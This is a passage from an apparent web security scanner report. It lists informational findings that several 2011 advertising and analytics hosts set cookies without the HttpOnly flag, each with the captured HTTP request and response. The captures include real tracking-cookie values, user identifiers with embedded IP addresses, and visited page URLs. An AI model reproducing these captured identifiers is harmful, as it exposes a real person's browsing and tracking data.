Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:22 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:22 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25746

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...

11.25. http://at.amgdgt.com/ads/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=pp&px=13933&rnd=[cachebuster] HTTP/1.1
Host: at.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAU6lf.fVeAIymmN1SQMQiY3K8TkjADA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2rqW8YoHJtQLnvQDkXmNyRfwuscOnb5NGZgUvfxptxk6FyLUAzfwLNdIOZudH8pglOfebp.rjlJIDu7FwC9EMz0MxfQDPdYWZO0o_wh8ph.K.XY5s3VA7DLb0cLv245DqyY07hlEtyu45TLsLrGk45vwkhOOVcGzigchjx0CHhfhunPgk7bVz62k_u3IRLX_vJGbU45U4ILwaGLSNO.cpuIaA8g.9xvQZQKgq8xSjICExPOxn5gRSDAR8DIzMjCxMrPxsjOyMHIycjFyM3Iw8jLyMfWAFLJqMIUN3SArAuBTOIYAiTCKMoUFh.FzcrE3aNi90ZgY6CJVqQCxgAgheTPA--

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUdGc9RhW_mTSRLtae_2aqZWuBa4kDA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2rqW8YoHJtQLnvQDkXmNyRfwuscOnb5NGZgUvfxptxk6FyLUAzfwLNdIOZudH8pglOfebp.rjlJIDu7FwC9EMz0MxfQDPdYWZO0o_wh8ph.K.XY5s3VA7DLb0cLv245DqyY07hlEtyu45TLsLrGk45vwkhOOVcGzigchjx0CHhfhunPgk7bVz62k_u3IRLX_vJGbU45U4ILwaGLSNO.cpuIaA8g.9xvQYGLgaG5eaMQMUMgbcYBYEU505GfiDFYMDHwMjMxMLPysjGyM7IwcjJyMXIzcjDyMvIB1bAkskoAlS3tACsS8EMIhjCJMIoChSW38XDwohL62J3sIXA1JsWdgrkEgYGANcJlFc-; Domain=.amgdgt.com; Expires=Wed, 08-Jun-2011 15:35:44 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://ib.adnxs.com/seg?add=101339&t=2
Content-Length: 0
Date: Mon, 09 May 2011 15:35:43 GMT


11.26. http://atd.agencytradingdesk.net/WatsonTracker/IMP/A1000138/C1000187/P1003017/pixel.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atd.agencytradingdesk.net
Path:   /WatsonTracker/IMP/A1000138/C1000187/P1003017/pixel.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WatsonTracker/IMP/A1000138/C1000187/P1003017/pixel.gif?address=http%3A//www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm&ref=&r=0.3293152619153261&TS=5963a0a2-47c8-4669-a18c-5cf46798e698&err= HTTP/1.1
Host: atd.agencytradingdesk.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=VsR1CHgGqJ2K; atd_event4=1000138|1000187|1003016||16|-1|-1|WI|5/9/2011 10:00:42 AM|6/8/2011 10:00:42 AM~1000138|1000187|1003017||296|-1|-1|WI|5/9/2011 11:29:32 AM|6/8/2011 11:29:32 AM

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:49 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: atd_event4=1000138|1000187|1003016||16|-1|-1|WI|5/9/2011 10:00:42 AM|6/8/2011 10:00:42 AM~1000138|1000187|1003017||296|-1|-1|WI|5/9/2011 11:36:49 AM|6/8/2011 11:36:49 AM; expires=Wed, 08-Jun-2011 15:36:49 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: image/GIF
Content-Length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

GIF89a.............!.......,........@..D.;

11.27. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035073&rn=1981680086&c7=http%3A%2F%2Fwww.csmonitor.com%2FBusiness&c8=Business%20news%20articles%20and%20blogs%20-%20The%20Christian%2&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 09 May 2011 15:34:58 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 08-May-2013 15:34:58 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


11.28. http://b.scorecardresearch.com/p

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6035179&c3=1&c4=69112&c5=172249&c6=&cv=1.3&cj=1&rn=2114357914 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 09 May 2011 15:35:19 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 08-May-2013 15:35:19 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

11.29. http://b.voicefive.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=253732017&c4=194941149&c5=1&c6=41&c7=sun%20apr%2024%2012%3A09%3A48%202011&c8=http%3A%2F%2Fwww.csmonitor.com%2FBusiness&c9=&c10=http%3A%2F%2Fwww.csmonitor.com%2FBusiness&c15=&1304955322131 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; BMX_G=method->-1,ts->1304954985; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:22 2011&prad=253732017&arc=194941149&; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 09 May 2011 15:35:23 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Wed, 08-May-2013 15:35:23 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


11.30. http://bh.contextweb.com/bh/rtset

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=536088&ev=914804995789526&rurl=http://matcher.bidder7.mookie1.com/do-association?return=ctxweb HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; vf=1; V=wOebwAz4UvVv; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|536088.914804995789526.0|535461.2931142961646634775.1

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web84
Cache-Control: no-cache, no-store
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Thu, 03-May-2012 15:38:27 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|536088.914804995789526.0|535461.2931142961646634775.1; Domain=.contextweb.com; Expires=Tue, 08-May-2012 15:38:27 GMT; Path=/
Location: http://matcher.bidder7.mookie1.com/do-association?return=ctxweb
Content-Type: text/html; charset=iso-8859-1
Content-Length: 0
Date: Mon, 09 May 2011 15:38:26 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"


11.31. http://bidder.mathtag.com/iframe/notify

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1304791875; ts=1304949603

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:16 GMT
Set-Cookie: mt_mop=4:1304955375; domain=.mathtag.com; path=/; expires=Thu, 08 May 2014 15:36:16 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Last-Modified: Mon, 09 May 2011 15:36:12 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x6, ewr-bidder-x2
Server: MMBD/3.5.5
Content-Length: 1125
Content-Type: text/html
Connection: keep-alive

<IFRAME SRC="http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=
...[SNIP]...

11.32. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2363415&PluID=0&w=300&h=250&ord=60643838482108259&ucm=true&ncu=$$http://pixel.mathtag.com/click/img?mt_aid=60643838482108259&mt_id=112711&mt_adid=100341&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://www.mediamath.com$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82MDY0MzgzODQ4MjEwODI1OS8xMTI3MTEvMTAxNzc4LzQvX2ZrTzhjMkc0aHVUREhNaTB2REd4bUZyWW93T240Z0pWR3dZWGlIQ3JTby8/wx5pTXc5IEg4EhGauv_ZowQal6A&price=TcgKYwADH_oK5XtBnK9ekEmaWNoad9RlH1xSlQ&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBkRfnYwrITfq_DMH2lQeQvb3lCdzvj_EB-PbyvBGErMGhDwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHg6pnsA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBSWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzcy8yMDExLzA1MDkvR2FzLXByaWNlcy1zdGFydC10by1oZWFkLWRvd26YAugHwAIEyALWwYwO4AIA6gIQMzAweDI1MENfR2VuZXJhbKgDAegD9AnoA5MF6AORA_UDAAQARPUDIAAAAOAEAYAGgIqNvobDucuOAQ%26num%3D1%26sig%3DAGiWqtzdUBy3-sRSj_5-4w3QHutXcJep2g%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=jlP8aJjE0dpH00001juYhaL6r07Kl00001jBofaIOs07Si00001jAsGaJH602WG00003; B3=9wtb0000000001ur8Whx0000000003uu9oDg0000000001ut98nW0000000001uy

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jlP8aJjE0dpH00001iRpfaL7W0c9M00001juYhaL6q07Kl00001jAsGaJH602WG00003jBofaIOs07Si00001; expires=Sun, 07-Aug-2011 11:38:52 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8Whx0000000003uu9wtb0000000001ur9oDg0000000001ut910n0000000001uy98nW0000000001uy; expires=Sun, 07-Aug-2011 11:38:52 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 09 May 2011 15:38:51 GMT
Connection: close
Content-Length: 2338

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

11.33. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:03 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=166
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:03 GMT
Connection: close
Content-Length: 1996

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...

11.34. http://ds.addthis.com/red/psi/sites/www.fox8live.com/p.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.fox8live.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.fox8live.com/p.json?callback=_ate.ad.hpr&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.fox8live.com%2Fnews%2Flocal%2Fstory%2FSt-Bernard-prepares-for-rising-Mississippi-River%2FvJUO9a9n60iNAXZ6QCm2oQ.cspx&xp66c HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%7D..1304951889.1FE|1304951889.60; dt=X; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 186
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 09 May 2011 15:38:05 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 08 Jun 2011 15:38:05 GMT; Path=/
Set-Cookie: di=%7B%7D..1304951889.1FE|1304955485.1OD|1304951889.60; Domain=.addthis.com; Expires=Wed, 08-May-2013 15:38:02 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 09 May 2011 15:38:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 15:38:05 GMT
